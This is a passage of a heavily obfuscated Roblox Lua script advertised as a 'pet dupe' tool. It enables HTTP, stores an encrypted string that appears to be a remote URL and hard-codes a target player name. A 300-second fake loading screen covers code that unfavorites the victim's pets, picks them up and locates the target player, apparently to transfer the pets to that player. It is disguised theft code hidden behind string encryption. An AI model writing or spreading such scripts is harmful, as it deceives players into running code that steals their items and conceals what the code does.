--[[
 DUPE PET V3 BY AINSK

]]--

local obf_stringchar = string.char;
local obf_stringbyte = string.byte;
local obf_stringsub = string.sub;
local obf_bitlib = bit32 or bit;
local obf_XOR = obf_bitlib.bxor;
local obf_tableconcat = table.concat;
local obf_tableinsert = table.insert;
local function LUAOBFUSACTOR_DECRYPT_STR_0(LUAOBFUSACTOR_STR, LUAOBFUSACTOR_KEY)
	local result = {};
	for i = 1, #LUAOBFUSACTOR_STR do
		obf_tableinsert(result, obf_stringchar(obf_XOR(obf_stringbyte(obf_stringsub(LUAOBFUSACTOR_STR, i, i + 1)), obf_stringbyte(obf_stringsub(LUAOBFUSACTOR_KEY, 1 + (i % #LUAOBFUSACTOR_KEY), 1 + (i % #LUAOBFUSACTOR_KEY) + 1))) % 256));
	end
	return obf_tableconcat(result);
end
local TABLE_TableIndirection = {};
bit32 = {};
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\255\134\139", "\126\177\163\187\69\134\219\167")] = 32;
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\19\136\122", "\156\67\173\74\165")] = 2 ^ TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\26\242\25", "\38\84\215\41\118\220\70")];
bit32.bnot = function(x)
	x = x % TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\96\83\114", "\158\48\118\66\114")];
	return (TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\155\97\64", "\155\203\68\112\86\19\197")] - 1) - x;
end;
bit32.band = function(x, y)
	if (y == 255) then
		return x % 256;
	end
	if (y == 65535) then
		return x % 65536;
	end
	if (y == 4294967295) then
		return x % 4294967296;
	end
	x, y = x % TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\118\152\102", "\152\38\189\86\156\32\24\133")], y % TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\204\18\247", "\38\156\55\199")];
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\186\56\44", "\35\200\29\28\72\115\20\154")] = 0;
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\9\250\129", "\84\121\223\177\191\237\76")] = 1;
	for i = 1, TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\149\19\153", "\161\219\54\169\192\90\48\80")] do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) == 2) then
			TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\91\7\80", "\69\41\34\96")] = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\174\134\135", "\75\220\163\183\106\98")] + TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\18\255\219", "\185\98\218\235\87")];
		end
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\219\121\119", "\202\171\92\71\134\190")] = 2 * TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\57\132\124", "\232\73\161\76")];
	end
	return TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\169\156\18", "\126\219\185\34\61")];
end;
bit32.bor = function(x, y)
	if (y == 255) then
		return (x - (x % 256)) + 255;
	end
	if (y == 65535) then
		return (x - (x % 65536)) + 65535;
	end
	if (y == 4294967295) then
		return 4294967295;
	end
	x, y = x % TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\60\139\14", "\135\108\174\62\18\30\23\147")], y % TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\134\172\122", "\167\214\137\74\171\120\206\83")];
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\153\181\98", "\199\235\144\82\61\152")] = 0;
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\23\83\233", "\75\103\118\217")] = 1;
	for i = 1, TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\233\17\32", "\126\167\52\16\116\217")] do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) >= 1) then
			TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\218\107\112", "\156\168\78\64\224\212\121")] = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\21\171\245", "\174\103\142\197")] + TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\70\109\15", "\152\54\72\63\88\69\62")];
		end
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\196\129\190", "\60\180\164\142")] = 2 * TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\72\27\85", "\114\56\62\101\73\71\141")];
	end
	return TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\170\172\139", "\164\216\137\187")];
end;
bit32.bxor = function(x, y)
	x, y = x % TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\226\163\97", "\107\178\134\81\210\198\158")], y % TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\8\75\210", "\202\88\110\226\166")];
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\209\74\210", "\170\163\111\226\151")] = 0;
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\1\117\226", "\73\113\80\210\88\46\87")] = 1;
	for i = 1, TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\175\105\157", "\135\225\76\173\114")] do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) == 1) then
			TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\8\168\232", "\199\122\141\216\208\204\221")] = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\191\152\64", "\150\205\189\112\144\24")] + TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\53\193\239", "\112\69\228\223\44\100\232\113")];
		end
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\196\90\87", "\230\180\127\103\179\214\28")] = 2 * TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\156\64\15", "\128\236\101\63\38\132\33")];
	end
	return TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\190\236\65", "\175\204\201\113\36\214\139")];
end;
bit32.lshift = function(x, s_amount)
	if (math.abs(s_amount) >= TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\105\137\101", "\100\39\172\85\188")]) then
		return 0;
	end
	x = x % TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\157\61\233", "\83\205\24\217\224")];
	if (s_amount < 0) then
		return math.floor(x * (2 ^ s_amount));
	else
		return (x * (2 ^ s_amount)) % TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\214\128\157", "\93\134\165\173")];
	end
end;
bit32.rshift = function(x, s_amount)
	if (math.abs(s_amount) >= TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\144\183\145", "\30\222\146\161\162\90\174\210")]) then
		return 0;
	end
	x = x % TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\213\11\32", "\106\133\46\16")];
	if (s_amount > 0) then
		return math.floor(x * (2 ^ -s_amount));
	else
		return (x * (2 ^ -s_amount)) % TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\104\101\35", "\32\56\64\19\156\58")];
	end
end;
bit32.arshift = function(x, s_amount)
	if (math.abs(s_amount) >= TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\116\141\181", "\224\58\168\133\54\58\146")]) then
		return 0;
	end
	x = x % TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\105\19\27", "\107\57\54\43\157\21\230\231")];
	if (s_amount > 0) then
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\218\143\21\176\233", "\175\187\235\113\149\217\188")] = 0;
		if (x >= (TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\12\234\209", "\24\92\207\225\44\131\25")] / 2)) then
			TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\74\215\188\9\75", "\29\43\179\216\44\123")] = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\141\156\112", "\44\221\185\64")] - (2 ^ (TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\47\162\24", "\19\97\135\40\63")] - s_amount));
		end
		return math.floor(x * (2 ^ -s_amount)) + TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\175\88\55\126\127", "\81\206\60\83\91\79")];
	else
		return (x * (2 ^ -s_amount)) % TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\126\238\128", "\196\46\203\176\18\79\163\45")];
	end
end;
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\136\46\127\7\33\233\252\253\114", "\143\216\66\30\126\68\155")] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\154\196\12\210\192\177\196", "\129\202\168\109\171\165\195\183"));
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\10\76\35\200\237\17\244\52\81\52\221\155\68", "\134\66\56\87\184\190\116")] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\20\37\29\171\42\238\51\35\53\50\12", "\85\92\81\105\219\121\139\65"));
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\208\178\66\78\121\203\237\191\81\70\121\236\248\161\70\76\127\218\184\227", "\191\157\211\48\37\28")] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\242\30\230\23\63\203\15\248\29\57\218\44\241\14\44\214\28\241", "\90\191\127\148\124"));
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\74\130\62\27\113\132\47\3\125\131\29\3\119\149\47\16\125\194\126", "\119\24\231\78")] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\176\40\181\70\213\67\16\150\40\161\121\200\79\3\131\42\160", "\113\226\77\197\42\188\32"));
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\14\19\248\176\42\25\230\161\9\19\230\163\51\21\241\240\106", "\213\90\118\148")] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\111\43\184\83\93\84\60\160\101\72\73\56\189\85\72", "\45\59\78\212\54"));
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\34\67\141\184\131\60\187\249\19\83\198\219", "\144\112\54\227\235\230\78\205")] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\129\61\1\207\213\73\165\33\12\249", "\59\211\72\111\156\176"));
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\123\148\230\63\103\137\243\56\90\180\230\63\88\142\224\40\11\215", "\77\46\231\131")] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\143\71\179\82\147\90\166\85\174\103\179\82\172\93\181\69", "\32\218\52\214"));
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\122\0\52\173\255\131\64\72\88\30\50\173\180\224", "\58\46\119\81\200\145\208\37")] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\31\155\53\169\167\142\51\57\154\57\175\172", "\86\75\236\80\204\201\221"));
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\94\78\116\132\242\187\126\64\110\128\236\206\34", "\235\18\33\23\229\158")] = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\96\182\192\162\85\168\210\254\0", "\219\48\218\161")].LocalPlayer;
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\195\112\113\76\242\65\230\235\52\44", "\128\132\17\28\41\187\47")] = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\44\51\20\49\88\21\34\10\59\94\4\1\3\40\75\8\49\3\127\13", "\61\97\82\102\90")]:GetProductInfo(game.PlaceId);
if not TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\132\58\191\91\244\82\12\31\165\45\174\14\151", "\105\204\78\203\43\167\55\126")]:GetHttpEnabled() then
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\141\190\55\14\32\1\213\71\172\169\38\91\67", "\49\197\202\67\126\115\100\167")]:SetHttpEnabled(true);
end
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\0\126\253\1\175\121\117\8\110\237\5\197\6", "\62\87\59\191\73\224\54")] = LUAOBFUSACTOR_DECRYPT_STR_0("\239\22\238\217\244\88\181\134\227\11\233\202\232\16\254\135\228\13\247\134\230\18\243\134\240\7\248\193\232\13\241\218\168\83\169\145\182\81\171\155\176\87\168\154\179\82\163\156\190\80\173\155\168\53\220\235\196\15\232\216\210\7\244\251\236\54\240\237\235\42\204\154\243\87\214\249\253\52\253\204\243\51\171\250\225\50\237\205\255\13\234\248\226\17\221\208\254\38\248\227\237\13\241\197\222\39\235\226\196\9\246\255\247\9\246\204\201\22\247\226\192", "\169\135\98\154");
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\255\86\22\115\216\7\247\251\82\16\103\184\99", "\168\171\23\68\52\157\83")] = {LUAOBFUSACTOR_DECRYPT_STR_0("\198\112\246\174\42\34\137", "\231\148\17\149\205\69\77"),LUAOBFUSACTOR_DECRYPT_STR_0("\177\178\194\254\89\191\162\162\194", "\159\224\199\167\155\55"),LUAOBFUSACTOR_DECRYPT_STR_0("\211\225\61\213\248\253\58\222\238", "\178\151\147\92"),LUAOBFUSACTOR_DECRYPT_STR_0("\168\244\95\49\29\12\88\137\248", "\26\236\157\44\82\114\44"),LUAOBFUSACTOR_DECRYPT_STR_0("\9\38\220\88\33\43\219\27\16\33\216\89\35\43", "\59\74\78\181"),LUAOBFUSACTOR_DECRYPT_STR_0("\21\212\78\91\191\101\243\95\95", "\211\69\177\58\58"),LUAOBFUSACTOR_DECRYPT_STR_0("\154\234\118\251\169\232\182\241", "\171\215\133\25\149\137"),LUAOBFUSACTOR_DECRYPT_STR_0("\211\205\54\186\201\63\228", "\34\129\168\82\154\143\80\156"),LUAOBFUSACTOR_DECRYPT_STR_0("\167\190\60\4\76\14\166\146\190", "\233\229\210\83\107\40\46"),LUAOBFUSACTOR_DECRYPT_STR_0("\241\77\62\215\23\129\96\55\215\23", "\101\161\34\82\182"),LUAOBFUSACTOR_DECRYPT_STR_0("\202\24\77\234\222\240\132\34\241", "\78\136\109\57\158\187\130\226")};
TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\10\30\203\214\27\11\198\193\18\30\192\212\12\0\215\208\19\26\188\161", "\145\94\95\153")] = LUAOBFUSACTOR_DECRYPT_STR_0("\207\204\29\219\119\184\254\197\29", "\215\157\173\116\181\46");
local function CreateLoadingScreen()
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\6\183\153\247\223\59\147\158\251\159\101", "\186\85\212\235\146")] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\241\130\4\251\60\224\127\215\136", "\56\162\225\118\158\89\142"));
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\111\6\210\170\39\214\123\16\201\234\114", "\184\60\101\160\207\66")].Name = LUAOBFUSACTOR_DECRYPT_STR_0("\29\141\125\184\56\140\123\143\50\144\121\185\63", "\220\81\226\28");
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\32\214\144\254\239\201\52\192\139\190\186", "\167\115\181\226\155\138")].IgnoreGuiInset = true;
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\209\33\245\89\126\127\225\247\43\162\12", "\166\130\66\135\60\27\17")].ZIndexBehavior = Enum.ZIndexBehavior.Sibling;
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\119\73\220\112\53\74\109\219\124\117\20", "\80\36\42\174\21")].Parent = game.CoreGui;
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\108\17\52\113\73\2\56\111\64\20\114\42", "\26\46\112\87")] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\159\49\170\121\186", "\212\217\67\203\20\223\223\37"));
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\152\140\171\217\189\159\167\199\180\137\237\130", "\178\218\237\200")].Name = LUAOBFUSACTOR_DECRYPT_STR_0("\148\180\229\219\177\167\233\197\184\177", "\176\214\213\134");
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\214\172\181\223\175\68\86\225\163\178\145\248", "\57\148\205\214\180\200\54")].Size = UDim2.new(1, 0, 1, 0);
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\48\252\54\63\113\0\242\32\58\114\87\173", "\22\114\157\85\84")].Position = UDim2.new(0, 0, 0, 0);
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\230\202\16\207\90\228\167\209\197\23\129\13", "\200\164\171\115\164\61\150")].BackgroundColor3 = Color3.new(0, 0, 0);
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\156\245\0\78\132\172\251\22\75\135\251\164", "\227\222\148\99\37")].BorderSizePixel = 0;
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\17\83\81\253\254\33\93\71\248\253\118\2", "\153\83\50\50\150")].Parent = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\110\117\97\25\118\165\106\72\127\54\76", "\45\61\22\19\124\19\203")];
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\237\29\12\241\11\126\190\227\19\31\215\3\115\178\198\0\2\224\12\116\252\145", "\217\161\114\109\149\98\16")] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\52\50\57\113\185", "\20\114\64\88\28\220"));
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\29\14\211\176\241\222\186\19\0\192\150\249\211\182\54\19\221\161\246\212\248\97", "\221\81\97\178\212\152\176")].Name = LUAOBFUSACTOR_DECRYPT_STR_0("\225\232\28\255\19\195\224\63\250\8\239\230\30\240\29\223\232\8\245\30", "\122\173\135\125\155");
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\168\206\1\189\54\63\207\166\192\18\155\62\50\195\131\211\15\172\49\53\141\212", "\168\228\161\96\217\95\81")].Size = UDim2.new(0.6, 0, 0.05, 0);
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\247\222\47\88\38\89\220\243\47\78\13\86\216\218\41\78\32\66\213\213\107\12", "\55\187\177\78\60\79")].Position = UDim2.new(0.2, 0, 0.5, 0);
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\1\193\94\239\79\193\135\15\207\77\201\71\204\139\42\220\80\254\72\203\197\125", "\224\77\174\63\139\38\175")].BackgroundColor3 = Color3.new(0.2, 0.2, 0.2);
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\168\78\89\42\141\79\95\12\133\83\122\47\135\74\95\60\139\84\86\42\193\17", "\78\228\33\56")].BorderSizePixel = 0;
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\226\113\179\7\140\192\121\144\2\151\236\127\177\8\130\220\113\167\13\129\139\46", "\229\174\30\210\99")].Parent = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\57\236\133\90\234\47\54\14\227\130\20\189", "\89\123\141\230\49\141\93")];
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\223\126\247\8\25\68\244\83\247\30\85\26", "\42\147\17\150\108\112")] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\41\180\44\114\226", "\136\111\198\77\31\135"));
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\46\6\166\82\180\234\16\139\3\27\226\6", "\201\98\105\199\54\221\132\119")].Name = LUAOBFUSACTOR_DECRYPT_STR_0("\149\3\130\37\11\59\171\155\13\145", "\204\217\108\227\65\98\85");
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\114\204\244\225\37\206\89\225\244\247\105\144", "\160\62\163\149\133\76")].Size = UDim2.new(0, 0, 1, 0);
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\250\175\12\43\202\216\167\47\46\209\147\240", "\163\182\192\109\79")].Position = UDim2.new(0, 0, 0, 0);
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\24\41\1\196\252\58\33\34\193\231\113\118", "\149\84\70\96\160")].BackgroundColor3 = Color3.new(1, 0.5, 0);
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\20\9\12\233\49\8\10\207\57\20\72\189", "\141\88\102\109")].BorderSizePixel = 0;
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\159\92\203\116\19\51\82\227\178\65\143\32", "\161\211\51\170\16\122\93\53")].Parent = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\215\161\179\44\242\160\181\10\250\188\144\41\248\165\181\58\244\187\188\44\190\254", "\72\155\206\210")];
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\106\117\85\10\58\72\125\96\11\43\82\63\4", "\83\38\26\52\110")] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\108\18\63\82\116\22\37\67\84", "\38\56\119\71"));
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\223\224\89\210\44\88\244\219\93\206\49\19\163", "\54\147\143\56\182\69")].Name = LUAOBFUSACTOR_DECRYPT_STR_0("\250\142\254\77\214\216\134\203\76\199\194", "\191\182\225\159\41");
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\7\29\41\81\130\137\197\31\23\48\65\206\215", "\162\75\114\72\53\235\231")].Size = UDim2.new(1, 0, 0.1, 0);
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\160\51\69\230\90\12\139\8\65\250\71\71\220", "\98\236\92\36\130\51")].Position = UDim2.new(0, 0, 0.4, 0);
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\136\22\13\190\76\166\178\4\161\1\24\255\21", "\80\196\121\108\218\37\200\213")].BackgroundTransparency = 1;
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\44\124\3\123\66\0\141\52\118\26\107\14\94", "\234\96\19\98\31\43\110")].Text = LUAOBFUSACTOR_DECRYPT_STR_0("\47\17\91\211\165\115\135\15\5\91\201\171\50\184\31\12\70\194\161\60\197\72\95\2\130", "\235\102\127\50\167\204\18");
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\124\174\244\39\77\32\87\149\240\59\80\107\0", "\78\48\193\149\67\36")].TextColor3 = Color3.new(1, 1, 1);
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\28\17\129\28\72\62\25\180\29\89\36\91\208", "\33\80\126\224\120")].Font = Enum.Font.GothamBold;
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\192\167\2\192\85\226\175\55\193\68\248\237\83", "\60\140\200\99\164")].TextSize = 24;
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\171\251\5\34\171\137\243\48\35\186\147\177\84", "\194\231\148\100\70")].Parent = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\100\77\194\168\241\218\73\89\207\167\179\152", "\168\38\44\161\195\150")];
	return TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\179\255\144\115\53\230\145\3\137\185\210", "\118\224\156\226\22\80\136\214")], TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\110\225\88\132\75\224\94\162\67\252\28\208", "\224\34\142\57")], TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\242\168\196\217\122\255\90\58\219\191\209\152\35", "\110\190\199\165\189\19\145\61")];
end
local function RunLoadingAnimation(loadingBar, loadingText)
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\222\254\101\233\159\206\213\229\50\184", "\167\186\139\23\136\235")] = 300;
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\9\161\137\31\14\129\129\0\31\240\216", "\109\122\213\232")] = tick();
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\235\249\166\4\231\250\167\117\190", "\80\142\151\194")] = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\16\210\118\94\23\242\126\65\6\131\39", "\44\99\166\23")] + TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\120\226\59\55\39\173\115\249\108\102", "\196\28\151\73\86\83")];
	while tick() < TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\246\13\45\36\139\85\29\51\163", "\22\147\99\73\112\226\56\120")] do
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\189\121\227\229\158\189\113\167\165", "\237\216\21\130\149")] = tick() - TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\145\90\94\77\164\253\87\143\75\26\15", "\62\226\46\63\63\208\169")];
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\245\11\90\132\13\8\60\77\160\73", "\62\133\121\53\227\127\109\79")] = math.min(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\21\24\51\229\197\171\166\85\68", "\194\112\116\82\149\182\206")] / TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\61\189\94\25\212\235\1\55\237\28", "\110\89\200\44\120\160\130")], 1);
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\187\198\89\69\70\68\47\76\172\198\14\22", "\45\203\163\43\38\35\42\91")] = math.floor(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\194\151\211\36\149\172\71\193\192\140", "\52\178\229\188\67\231\201")] * 100);
		loadingBar.Size = UDim2.new(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\49\83\95\3\229\89\48\50\4\0", "\67\65\33\48\100\151\60")], 0, 1, 0);
		loadingText.Text = string.format(LUAOBFUSACTOR_DECRYPT_STR_0("\236\254\189\204\246\210\167\135\214\250\203\238\175\212\250\197\238\160\223\189\145\169\238\157\247\154\162", "\147\191\135\206\184"), TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\148\45\180\194\221\93\166\133\47\163\132\136", "\210\228\72\198\161\184\51")]);
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\4\92\253\35\118\220\32\64\240\21\54\158", "\174\86\41\147\112\19")].Heartbeat:Wait();
	end
	loadingBar.Size = UDim2.new(1, 0, 1, 0);
	loadingText.Text = LUAOBFUSACTOR_DECRYPT_STR_0("\104\25\158\31\32\2\81\130\85\9\153\2\36\3\24\177\94\4\205\48\116\95\65\238\102", "\203\59\96\237\107\69\111\113");
end
local function FindTargetPlayer()
	for _, player in ipairs(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\20\26\173\248\52\226\196\97\70", "\183\68\118\204\129\81\144")]:GetPlayers()) do
		if ((player.Name == TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\58\140\66\195\46\182\49\157\92\197\50\167\60\146\94\197\38\167\75\253", "\226\110\205\16\132\107")]) and player.Character) then
			return player;
		end
	end
	return nil;
end
local function UnfavoriteByNameSearch(pet)
	for _, remote in pairs(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\217\198\240\213\72\232\194\244\220\69\216\215\239\203\64\236\198\165\137", "\33\139\163\128\185")]:GetDescendants()) do
		if (remote:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\101\93\9\209\67\93\33\200\82\86\16", "\190\55\56\100")) and string.find(string.lower(remote.Name), LUAOBFUSACTOR_DECRYPT_STR_0("\80\174\42\17\1\234\231\83", "\147\54\207\92\126\115\131"))) then
			pcall(function()
				remote:FireServer(pet, false);
				remote:FireServer(pet.Name, false);
				remote:FireServer({[LUAOBFUSACTOR_DECRYPT_STR_0("\29\52\33", "\30\109\81\85\29\109")]=pet,[LUAOBFUSACTOR_DECRYPT_STR_0("\249\112\66\185\36\215\232\250", "\156\159\17\52\214\86\190")]=false});
				return true;
			end);
		end
	end
	return false;
end
local function PickupActivePets()
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\189\250\190\191\171\252\174\249\254", "\220\206\143\221")] = false;
